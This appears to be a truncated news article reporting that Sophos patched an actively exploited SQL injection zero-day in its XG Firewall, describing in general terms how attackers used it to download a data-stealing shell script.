Cybersecurity company Sophos informed customers over the weekend that it has patched a zero-day vulnerability that has been exploited to deliver malware to its XG Firewall appliances.
Sophos said it learned about attacks targeting its XG firewall on April 22 after a suspicious field value was discovered in a device’s management interface. An investigation revealed that attackers have been exploiting a previously unknown SQL injection vulnerability to hack exposed physical and virtual firewalls. Multiple customers were targeted.
According to the company, the attack was aimed at systems with the administration service or the user portal exposed to the internet. The attackers were apparently trying to exploit the security hole to download malware that would allow them to exfiltrate data from the firewall.
This data can include usernames and password hashes for the local device administrators, portal admins, and user accounts set up for remote access. The malware could have also gained access to information about the firewall, email addresses of accounts stored on the appliance, and information on IP address allocation permissions.
“Passwords associated with external authentication systems such as AD or LDAP are unaffected,” Sophos told customers.
Sophos started taking measures shortly after the attack started and it rolled out a SFOS hotfix that patches the SQL injection vulnerability on April 25. Once they have applied the hotfix, users are also informed if their firewall has been compromised as part of this attack.
In a blog post published late on Sunday, Sophos revealed that the attacker exploited the SQL injection vulnerability to insert a one-line command into the firewall database. This command caused affected devices to download a Linux shell script named Install.sh from a remote s ..
Support the originator by clicking the read the rest link below.
